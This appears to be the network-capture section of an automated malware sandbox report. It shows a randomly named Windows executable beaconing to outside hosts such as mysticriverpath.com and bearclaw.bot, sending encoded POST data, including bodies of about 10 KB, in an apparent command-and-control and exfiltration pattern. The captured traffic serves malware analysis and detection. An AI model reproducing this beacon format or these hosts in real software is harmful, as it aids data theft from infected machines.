                            Data Ascii: UbV=ygJol3Cc67Yay2THZ2GsA7tYL/FvH0IvfhwfoPBfHD9bcVIVVriZmQt4KI8tFqKjIb/keBN7DaDbhoNqEPc49Kh/YMuqLTuI8MLO1mtlOadIbw+/C+j22BNo3inRoQUkb+/P46mG3wKN8vkr06rAgmd+WLJ65n65PSOCIN8FjX2keXqZexRxD5FJ2sg12+TkRh5F/yJxe83yVafAcgv6C8aTmQ0wu6Si1P5R6IxiQN0NcCrsaM2vSNvvx+jnJrdCuMvsLIe7iTk2ojZ1rQbClzKEvBjWwjwagu4t/YFoZ8oo2Frhta4XkAU+yTRTygKM0mU7c7Yzp246BplSLjWxTBCbvPdy2lDn007BynoeIi5vAi1kvPt4BleQvS5ko/9rpBlFUsqeqsI8DiuUrtRifBNobweWDflUUorxGUGRVVYtqDQxtmJN7HtC3YTWBLcTbFiFyVdGkoelb0StshdbZMGPm40DhwPLgh3ruEs0atLlo9dpWMOJZjoXbcbreEIHyWcHyvIEvy4YCze1iXXgF6VPNzap21FvRG6fHzgpKkP5zPkKikFCrRZX5hHj6ZULgw2BLSMWqJxGzEMm3P42CBOIzCJqXYDhd7hShfN9p+zyOoHwoMtUDoe/PFTFpKab2fwf92u45sW4IWtq6kHSJddd1hYnS5ghAzBm0frQJLN1tsZNn9W8ks9ssMwVUxoHDj6GWiJT88tNIT2nzOfj8ceSGzAzI06/8jQBXm2cFuIU9lRI3F8D/O1y2WF6dSMcY5P+hSRcxRM5ZUZaRqf1tgWC0erkgZjMzI8P0uKc9XmBbF44rhDq9P5PEWPritB389OZBcPkIufrukiS8duupTPoyS8SwQo2vpdLIReyBcRYMPJkOICuTcItO//nbvPV/P2MSdcc8sIbfMjFmUwatFsAVOL2KPvGMdoGX4E+4a1G8e9T5oqT7ZmjItz9dDHhQhXrXmIg8IVrEUYMtm9+Y5vIe2SAMpIbsYEZ7Qyt8NaGmmfv [TRUNCATED]


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            4192.168.2.4497413.33.130.190801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:22:15.465100050 CEST370OUTGET /7ein/?UbV=/ihImCX+1rYe7Vz3Kk/QKb9OP755DF44RGQCiMJXBGw4by48MaukmXBDJs8Bc6H1E8vVem8tLNCMtrUfB/Ur9IMKSu+lAmmznonV11JSP5QMQGeoH+bhzTc=&Y4gp=mlltcrRxcL HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Connection: close
                            Host: www.quixaclienti.com
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Jul 16, 2024 07:22:15.940253973 CEST395INHTTP/1.1 200 OK
                            Server: openresty
                            Date: Tue, 16 Jul 2024 05:22:15 GMT
                            Content-Type: text/html
                            Content-Length: 255
                            Connection: close
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 55 62 56 3d 2f 69 68 49 6d 43 58 2b 31 72 59 65 37 56 7a 33 4b 6b 2f 51 4b 62 39 4f 50 37 35 35 44 46 34 34 52 47 51 43 69 4d 4a 58 42 47 77 34 62 79 34 38 4d 61 75 6b 6d 58 42 44 4a 73 38 42 63 36 48 31 45 38 76 56 65 6d 38 74 4c 4e 43 4d 74 72 55 66 42 2f 55 72 39 49 4d 4b 53 75 2b 6c 41 6d 6d 7a 6e 6f 6e 56 31 31 4a 53 50 35 51 4d 51 47 65 6f 48 2b 62 68 7a 54 63 3d 26 59 34 67 70 3d 6d 6c 6c 74 63 72 52 78 63 4c 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?UbV=/ihImCX+1rYe7Vz3Kk/QKb9OP755DF44RGQCiMJXBGw4by48MaukmXBDJs8Bc6H1E8vVem8tLNCMtrUfB/Ur9IMKSu+lAmmznonV11JSP5QMQGeoH+bhzTc=&Y4gp=mlltcrRxcL"}</script></head></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            5192.168.2.449742216.194.173.237801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:22:21.268296003 CEST652OUTPOST /6vu8/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 200
                            Cache-Control: max-age=0
                            Host: www.mysticriverpath.com
                            Origin: http://www.mysticriverpath.com
                            Referer: http://www.mysticriverpath.com/6vu8/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 77 44 34 77 37 2f 32 54 55 4e 6e 4e 50 6f 59 72 44 4a 33 67 4f 6a 78 4a 6b 51 38 4b 51 69 44 69 47 64 35 36 2f 65 2f 64 66 66 7a 39 4e 31 65 32 61 68 76 65 4b 50 69 41 4f 66 58 67 6e 6d 62 76 61 45 4d 4d 32 58 4f 63 5a 50 50 7a 61 75 77 6a 77 50 77 77 31 65 47 79 70 52 54 76 39 31 71 51 63 32 7a 39 4b 70 59 42 65 39 4d 6c 39 64 6f 2b 65 42 6f 76 6c 62 2f 54 63 4f 5a 46 58 41 55 5a 45 31 43 6e 70 53 4b 38 69 41 6a 49 36 4b 5a 72 64 72 2f 43 4b 76 44 67 74 66 44 72 45 34 58 62 42 33 79 6f 70 62 30 4b 72 63 6f 6d 54 6c 2f 6d 5a 57 6d 56 62 32 59 72 41 72 70 55 56 69 53 75 44 41 3d 3d
                            Data Ascii: UbV=wD4w7/2TUNnNPoYrDJ3gOjxJkQ8KQiDiGd56/e/dffz9N1e2ahveKPiAOfXgnmbvaEMM2XOcZPPzauwjwPww1eGypRTv91qQc2z9KpYBe9Ml9do+eBovlb/TcOZFXAUZE1CnpSK8iAjI6KZrdr/CKvDgtfDrE4XbB3yopb0KrcomTl/mZWmVb2YrArpUViSuDA==
                            Jul 16, 2024 07:22:21.846611977 CEST479INHTTP/1.1 404 Not Found
                            Date: Tue, 16 Jul 2024 05:22:21 GMT
                            Server: Apache
                            Content-Length: 315
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            6192.168.2.449743216.194.173.237801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:22:23.814245939 CEST672OUTPOST /6vu8/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 220
                            Cache-Control: max-age=0
                            Host: www.mysticriverpath.com
                            Origin: http://www.mysticriverpath.com
                            Referer: http://www.mysticriverpath.com/6vu8/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 77 44 34 77 37 2f 32 54 55 4e 6e 4e 50 4e 51 72 42 72 66 67 50 44 78 4f 72 77 38 4b 66 43 44 2b 47 64 46 36 2f 61 4f 41 65 74 58 39 4e 55 75 32 5a 6a 58 65 4e 50 69 41 46 2f 58 66 34 57 62 61 61 45 49 45 32 57 69 63 5a 50 62 7a 61 71 34 6a 77 34 46 6d 31 4f 47 77 38 68 54 68 6a 46 71 51 63 32 7a 39 4b 71 6b 2f 65 39 45 6c 36 74 59 2b 64 6a 51 67 73 37 2f 51 62 4f 5a 46 54 41 55 64 45 31 44 45 70 54 57 53 69 44 62 49 36 50 39 72 54 61 2f 44 42 76 44 63 79 76 43 47 49 49 69 55 59 46 75 6e 6a 36 45 74 74 65 45 77 62 44 75 38 49 6e 48 43 4a 32 38 59 64 73 67 67 59 68 76 6e 59 48 65 6f 74 4f 35 65 43 36 6f 33 50 58 33 46 36 65 44 6a 51 6f 38 3d
                            Data Ascii: UbV=wD4w7/2TUNnNPNQrBrfgPDxOrw8KfCD+GdF6/aOAetX9NUu2ZjXeNPiAF/Xf4WbaaEIE2WicZPbzaq4jw4Fm1OGw8hThjFqQc2z9Kqk/e9El6tY+djQgs7/QbOZFTAUdE1DEpTWSiDbI6P9rTa/DBvDcyvCGIIiUYFunj6EtteEwbDu8InHCJ28YdsggYhvnYHeotO5eC6o3PX3F6eDjQo8=
                            Jul 16, 2024 07:22:24.405503035 CEST479INHTTP/1.1 404 Not Found
                            Date: Tue, 16 Jul 2024 05:22:24 GMT
                            Server: Apache
                            Content-Length: 315
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            7192.168.2.449744216.194.173.237801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:22:26.356976032 CEST10754OUTPOST /6vu8/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 10300
                            Cache-Control: max-age=0
                            Host: www.mysticriverpath.com
                            Origin: http://www.mysticriverpath.com
                            Referer: http://www.mysticriverpath.com/6vu8/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 77 44 34 77 37 2f 32 54 55 4e 6e 4e 50 4e 51 72 42 72 66 67 50 44 78 4f 72 77 38 4b 66 43 44 2b 47 64 46 36 2f 61 4f 41 65 74 66 39 4e 6d 6d 32 5a 45 37 65 4d 50 69 41 49 66 58 6b 34 57 62 48 61 41 63 41 32 57 2f 6e 5a 4d 6a 7a 63 4e 34 6a 32 4a 46 6d 36 4f 47 77 6a 78 54 73 39 31 71 2f 63 32 6a 35 4b 71 30 2f 65 39 45 6c 36 75 41 2b 4b 68 6f 67 67 62 2f 54 63 4f 5a 5a 58 41 56 41 45 78 75 2f 70 51 36 73 69 7a 37 49 37 76 74 72 52 73 44 44 64 2f 44 65 78 76 43 65 49 49 2f 55 59 46 6a 57 6a 36 77 58 74 66 38 77 5a 79 4f 6d 55 54 62 38 57 51 39 43 4b 64 42 43 66 43 2f 30 52 58 6d 6b 72 4d 5a 56 61 70 4d 38 46 31 48 4f 76 4f 44 37 54 2b 7a 6c 35 71 62 78 53 43 71 68 6d 6c 57 6e 4f 32 4c 52 49 4a 6e 55 4f 4f 77 39 63 4a 71 47 71 33 41 38 49 66 63 4b 39 69 38 65 67 30 67 56 65 74 5a 4e 31 2f 6e 62 44 70 6f 67 58 2b 71 44 41 79 79 59 68 4a 49 75 6f 66 35 76 76 62 54 56 6a 74 55 30 6b 58 49 59 2f 44 6b 4a 34 68 70 31 7a 37 6b 33 4d 4b 42 4d 6c 50 55 2b 73 75 75 4f 56 71 50 73 53 6b 37 30 35 48 [TRUNCATED]
                            Data Ascii: UbV=wD4w7/2TUNnNPNQrBrfgPDxOrw8KfCD+GdF6/aOAetf9Nmm2ZE7eMPiAIfXk4WbHaAcA2W/nZMjzcN4j2JFm6OGwjxTs91q/c2j5Kq0/e9El6uA+Khoggb/TcOZZXAVAExu/pQ6siz7I7vtrRsDDd/DexvCeII/UYFjWj6wXtf8wZyOmUTb8WQ9CKdBCfC/0RXmkrMZVapM8F1HOvOD7T+zl5qbxSCqhmlWnO2LRIJnUOOw9cJqGq3A8IfcK9i8eg0gVetZN1/nbDpogX+qDAyyYhJIuof5vvbTVjtU0kXIY/DkJ4hp1z7k3MKBMlPU+suuOVqPsSk705HtKRJAT02P7B0mkz2ZDqVRgYkvG+nBKe8ujjm+g13CtcX/Oe1hYvBH6CSwgYs4iSpTYPkpQ/ACNdEx8NmgFxZxMimzs6ApCXj7b/6D6ot6DbA3PYio+K+3czsnFong4XnZH+IB96u2yyNWcW6fTAAA0NvrwHfYfIiTmDWSeboem3CWd7RQ8iliee7YeFbtdpidKqxifcLDPcdpKx0x0va+gWwJ8mp45Ztsp+X3pz7bvPw3WOixe7JyBoL9yE8gdOY29PLnqYgcM0cHn7/YRG9YC8wf3zzHytYByxJobShjZ+5cK5eOGqUhz0FbH51EfVHjRLbyUuRjoESNLKf6+FpgCMw7Up7eoCeUvRA4CgWkRHvyyILg+6ilTOj1U2SWL2T1tfCZ4joRF8MZ9DNzRjMR8/fD76ykUqW0nnkRMBR7ny/79mjiT9TNZUKU65t78SRXUyY4TMP/i0yLMWw8eVeZmXPx5nLV5FdDqK/2idoT2zORg9mNhmRFD0WrV0+qOxoeS5cy0ypK5/W/uJZz5fHAX614p7QqCXwqLdik5dHrvOHV8m4xN37McThHpq2rbJ2zmaLR8GjaHOLQIz8YTtqePAjP4daINS810+DcKKg52hUU/jWdh16lH00XwHBkkLdkSAJD9CoLmrKwl3OiAUxecz4BixPLENL1C [TRUNCATED]
                            Jul 16, 2024 07:22:26.963517904 CEST479INHTTP/1.1 404 Not Found
                            Date: Tue, 16 Jul 2024 05:22:26 GMT
                            Server: Apache
                            Content-Length: 315
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            8192.168.2.449745216.194.173.237801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:22:28.906313896 CEST373OUTGET /6vu8/?UbV=9BQQ4LaVGcGIAegoNYy4BANrrk0FTQnfEPkS9PLUef2OP02gFBPJINGmLbjvn2PiRjYvhByaYI3HRuE2zbw60OnBrR/0yXqwb0H4BL8PQO8YxsUyAjYVuYA=&Y4gp=mlltcrRxcL HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Connection: close
                            Host: www.mysticriverpath.com
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Jul 16, 2024 07:22:29.476762056 CEST479INHTTP/1.1 404 Not Found
                            Date: Tue, 16 Jul 2024 05:22:29 GMT
                            Server: Apache
                            Content-Length: 315
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            9192.168.2.4497463.33.130.190801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:22:34.516191959 CEST631OUTPOST /f6em/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 200
                            Cache-Control: max-age=0
                            Host: www.bearclaw.bot
                            Origin: http://www.bearclaw.bot
                            Referer: http://www.bearclaw.bot/f6em/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 36 75 30 38 38 51 4c 43 32 63 44 51 75 63 36 70 78 4a 76 71 4f 4f 32 54 51 58 4e 4a 46 70 31 46 39 5a 45 66 4d 6f 58 66 4f 36 57 35 69 30 62 79 62 57 57 34 67 4f 5a 31 2f 36 37 75 51 6b 45 35 78 59 72 2b 43 48 56 65 50 4d 6d 4a 64 52 7a 57 73 65 59 4f 43 6f 65 44 38 48 51 44 7a 68 6a 55 30 42 71 71 58 32 52 6d 35 31 75 61 70 6a 6c 43 6f 54 75 79 47 63 2b 43 38 41 6b 44 4e 73 7a 48 62 2b 36 55 6b 50 76 36 76 4b 4c 4f 6e 75 55 75 53 68 62 43 65 4f 73 71 42 4a 78 53 67 4a 63 64 56 56 5a 72 43 56 56 4d 59 42 71 38 68 49 52 78 79 42 31 77 32 32 75 6a 77 76 48 58 67 63 6f 2f 33 77 3d 3d
                            Data Ascii: UbV=6u088QLC2cDQuc6pxJvqOO2TQXNJFp1F9ZEfMoXfO6W5i0bybWW4gOZ1/67uQkE5xYr+CHVePMmJdRzWseYOCoeD8HQDzhjU0BqqX2Rm51uapjlCoTuyGc+C8AkDNszHb+6UkPv6vKLOnuUuShbCeOsqBJxSgJcdVVZrCVVMYBq8hIRxyB1w22ujwvHXgco/3w==


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            10192.168.2.4497473.33.130.190801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:22:37.058175087 CEST651OUTPOST /f6em/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 220
                            Cache-Control: max-age=0
                            Host: www.bearclaw.bot
                            Origin: http://www.bearclaw.bot
                            Referer: http://www.bearclaw.bot/f6em/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 36 75 30 38 38 51 4c 43 32 63 44 51 76 2f 53 70 69 61 33 71 49 75 32 55 4f 48 4e 4a 4b 4a 31 4a 39 5a 49 66 4d 70 44 50 4f 4d 75 35 69 56 72 79 4a 6c 4f 34 74 75 5a 31 77 61 37 72 54 55 45 32 78 59 76 32 43 46 42 65 50 4d 69 4a 64 55 50 57 73 76 59 4a 41 34 65 4e 30 6e 51 42 74 52 6a 55 30 42 71 71 58 32 30 78 35 31 6d 61 71 51 39 43 6f 32 43 78 50 38 2b 42 73 51 6b 44 4a 73 7a 44 62 2b 36 32 6b 4f 6a 51 76 49 44 4f 6e 73 63 75 53 51 62 44 55 4f 73 6f 65 5a 77 42 6f 36 70 70 5a 46 73 38 44 33 31 33 58 6b 4f 77 74 75 41 72 6a 77 55 6e 6b 32 4b 51 74 6f 4f 6a 74 66 56 32 73 78 4d 7a 31 53 59 31 52 4d 6a 57 57 61 70 69 35 69 39 34 6f 30 67 3d
                            Data Ascii: UbV=6u088QLC2cDQv/Spia3qIu2UOHNJKJ1J9ZIfMpDPOMu5iVryJlO4tuZ1wa7rTUE2xYv2CFBePMiJdUPWsvYJA4eN0nQBtRjU0BqqX20x51maqQ9Co2CxP8+BsQkDJszDb+62kOjQvIDOnscuSQbDUOsoeZwBo6ppZFs8D313XkOwtuArjwUnk2KQtoOjtfV2sxMz1SY1RMjWWapi5i94o0g=


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            11192.168.2.4497483.33.130.190801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:22:39.591182947 CEST10733OUTPOST /f6em/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 10300
                            Cache-Control: max-age=0
                            Host: www.bearclaw.bot
                            Origin: http://www.bearclaw.bot
                            Referer: http://www.bearclaw.bot/f6em/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 36 75 30 38 38 51 4c 43 32 63 44 51 76 2f 53 70 69 61 33 71 49 75 32 55 4f 48 4e 4a 4b 4a 31 4a 39 5a 49 66 4d 70 44 50 4f 4d 6d 35 69 44 2f 79 59 31 79 34 73 75 5a 31 35 36 37 71 54 55 45 52 78 63 37 79 43 46 39 6f 50 4f 71 4a 63 78 44 57 39 4c 30 4a 4a 34 65 4e 34 48 51 43 7a 68 69 4f 30 46 4f 6d 58 32 45 78 35 31 6d 61 71 57 35 43 71 6a 75 78 4e 38 2b 43 38 41 6b 48 4e 73 79 6b 62 2b 53 48 6b 4f 33 71 76 34 6a 4f 6e 4d 4d 75 42 43 44 44 59 4f 73 75 66 5a 78 47 6f 36 31 32 5a 46 77 77 44 7a 39 64 58 69 79 77 39 37 42 51 34 30 63 7a 35 30 43 33 2b 76 6e 45 32 34 6f 30 6c 47 45 6f 7a 42 4d 51 4e 66 66 48 64 4e 5a 6e 70 67 4e 41 30 45 67 38 50 36 77 79 2b 6c 48 61 38 61 47 65 65 76 48 71 4e 32 52 46 41 59 6b 56 6b 36 4f 5a 44 35 33 64 55 59 36 74 2b 4c 75 57 62 35 75 50 63 36 50 6f 4e 34 4d 42 74 47 78 63 6b 71 77 6f 6e 55 74 78 39 56 53 36 47 37 70 69 6b 37 78 6d 43 36 43 57 66 58 35 50 69 70 42 2b 61 46 32 6f 6f 79 62 45 79 30 57 43 38 6d 7a 4f 55 2f 63 6f 56 72 79 62 6a 71 75 37 66 31 [TRUNCATED]
